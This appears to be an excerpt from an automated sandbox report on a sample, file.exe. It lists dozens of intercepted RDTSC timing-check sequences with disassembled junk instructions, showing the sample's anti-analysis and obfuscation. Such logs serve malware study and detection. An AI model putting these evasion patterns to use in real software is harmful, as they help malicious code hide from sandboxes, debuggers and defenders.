Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 702734 second address: 70273A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70273A second address: 70274A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FCA94C93E36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70274A second address: 702754 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78318C second address: 783196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94C93E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783196 second address: 7831A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FCA94618466h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7831A6 second address: 7831AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783587 second address: 78358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78358D second address: 7835A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FCA94C93E42h 0x0000000b jo 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783854 second address: 78386B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCA9461846Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72D6BD second address: 72D6C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7841A2 second address: 7841A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7841A6 second address: 7841B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94C93E3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782BC6 second address: 782BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 782BCB second address: 782BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78713A second address: 787154 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618472h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B57F second address: 78B58E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A3D2 second address: 78A3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A3DA second address: 78A3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7459ED second address: 72CB58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and cx, BE19h 0x0000000e call dword ptr [ebp+122D57EEh] 0x00000014 jmp 00007FCA9461846Ch 0x00000019 push esi 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745A92 second address: 745A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745E24 second address: 745E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCA94618476h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745E47 second address: 745E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCA94C93E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74623D second address: 746252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FCA9461846Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7463E3 second address: 746444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FCA94C93E4Ch 0x0000000b popad 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D394Ch] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FCA94C93E38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f pushad 0x00000030 add edx, dword ptr [ebp+122D19F9h] 0x00000036 mov di, AD06h 0x0000003a popad 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7467A5 second address: 7467AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7467AA second address: 7467FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FCA94C93E38h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 sub dword ptr [ebp+122D57A7h], ebx 0x0000002c push 0000001Eh 0x0000002e mov edi, esi 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FCA94C93E49h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74693F second address: 746943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746943 second address: 746949 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746B76 second address: 746C17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94618474h 0x0000000c jmp 00007FCA9461846Eh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007FCA94618478h 0x0000001a lea eax, dword ptr [ebp+124776F4h] 0x00000020 and cl, FFFFFFE0h 0x00000023 push eax 0x00000024 pushad 0x00000025 jmp 00007FCA9461846Ah 0x0000002a push ebx 0x0000002b jmp 00007FCA9461846Dh 0x00000030 pop ebx 0x00000031 popad 0x00000032 mov dword ptr [esp], eax 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FCA94618468h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jmp 00007FCA94618472h 0x00000054 lea eax, dword ptr [ebp+124776B0h] 0x0000005a movsx ecx, si 0x0000005d push eax 0x0000005e push ecx 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746C17 second address: 72D6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FCA94C93E38h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 xor dword ptr [ebp+122D17BCh], ebx 0x00000029 call dword ptr [ebp+122D1B32h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCA94C93E45h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A87C second address: 78A893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A893 second address: 78A89B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78ABD2 second address: 78ABD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78ABD9 second address: 78ABE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FCA94C93E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B14E second address: 78B158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B158 second address: 78B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78F296 second address: 78F2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78F2A0 second address: 78F2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EE34 second address: 78EE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EE47 second address: 78EE51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EF7F second address: 78EFBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618479h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78EFBA second address: 78EFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791E0B second address: 791E10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791E10 second address: 791E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795D8F second address: 795D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 795592 second address: 79559C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94C93E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79559C second address: 7955A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7955A2 second address: 7955C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E3Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 je 00007FCA94C93E36h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7955C3 second address: 7955C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7955C8 second address: 7955DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007FCA94C93E42h 0x0000000b ja 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7465C5 second address: 7465CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79A575 second address: 79A593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E3Fh 0x0000000b jp 00007FCA94C93E36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EC70 second address: 79EC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EC76 second address: 79EC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A14E8 second address: 7A14ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A73F6 second address: 7A73FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A73FB second address: 7A740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007FCA94618472h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A740F second address: 7A7415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7415 second address: 7A7448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 jmp 00007FCA94618476h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7448 second address: 7A744C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A744C second address: 7A7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A797B second address: 7A7993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7993 second address: 7A79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 js 00007FCA94618468h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCA9461846Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7EC5 second address: 7A7EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A81EA second address: 7A8208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 jng 00007FCA94618466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8208 second address: 7A8213 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FCA94C93E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A84CC second address: 7A84DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FCA94618466h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A87D0 second address: 7A87D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A87D4 second address: 7A87E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8DBE second address: 7A8DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8DC2 second address: 7A8DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A909E second address: 7A90A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A90A2 second address: 7A90A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC279 second address: 7AC27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC27D second address: 7AC291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FCA9461846Ch 0x0000000e jg 00007FCA94618466h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC811 second address: 7AC817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC817 second address: 7AC81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B1B second address: 7B9B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B24 second address: 7B9B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B2A second address: 7B9B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B2E second address: 7B9B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B32 second address: 7B9B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007FCA94C93E36h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jp 00007FCA94C93E36h 0x0000001a pop edx 0x0000001b je 00007FCA94C93E3Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B55 second address: 7B9B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BA6 second address: 7B7BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BB7 second address: 7B7BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BBB second address: 7B7BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCA94C93E3Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCA94C93E48h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BED second address: 7B7C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA9461846Bh 0x00000009 jnl 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7C02 second address: 7B7C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8078 second address: 7B8098 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618475h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8098 second address: 7B80B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B80B0 second address: 7B80B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8347 second address: 7B834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B834B second address: 7B8364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8364 second address: 7B8381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCA94C93E3Ah 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8381 second address: 7B83AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCA9461846Ch 0x0000000e jl 00007FCA94618466h 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007FCA94618473h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
